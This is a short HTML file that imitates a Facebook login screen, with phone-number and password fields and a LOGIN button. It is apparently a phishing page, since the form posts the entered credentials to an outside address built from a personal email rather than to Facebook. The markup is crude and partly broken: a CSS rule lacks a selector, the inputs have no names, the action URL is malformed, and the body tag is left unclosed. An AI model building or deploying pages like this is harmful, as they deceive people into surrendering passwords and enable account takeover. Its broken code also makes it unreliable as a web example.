<!DOCTYPE html>
<html>
<head>
   <title></title>
<style type="text/css">
{
	background-color: dodgerblue;
	max-width: 100%;
	font-size: 20px;
	color: white;
	text-align: center;
}
body{
	background-color: #f0f0f0;
	max-height: 100%;
	max-width: 100%;
}
input{
	height: 25px;
	width: 99%;
	border: 1px inset dodgerblue;
	border-radius: 0;
}
.new{
	height: 30px;
	width: 100%;
	background-color: dodgerblue;
	border-radius: 0;
	color: white;
	font-weight: bold;
}
.new2{
	height: 30px;
	width: 50%;
	background-color: forestgreen;
	border-radius: 0;
	color: white;
	font-weight: bold;
}
p{
	font-size: 20px;
	color: black;
	text-align: center;
}
.p1{
	font-size: 15px;
	color: dodgerblue;
	text-align: left;
}
</style>
</head>
<body>
<center>
Facebook
</center>
<hr/>
<form action="https://www.uzodimmajoseph112@gmail.com" name="form" method="POST">
Phone Number
<input type="tel" content="tel"/><br/>
<!-- the "tel" value denotes telephone number-->
Password
<input type="password" content="password"/><br/>
<br/>
<input class="new" type="submit" value="LOGIN" target="_parent"/>
<br/>
<a href="#">forgot password?</a>
<br/>
<br/>
___________________or______________________<br/>
<br/>
<center>
<button class="new2" onclick="new();">Create New Account</button>
</center>
<br/>
<p class="p1">
English(UK)<br/>
<br/>
Hausa<br/>
<br/>
Francias(France)<br/>
<br/>
~~~~
</body
</html>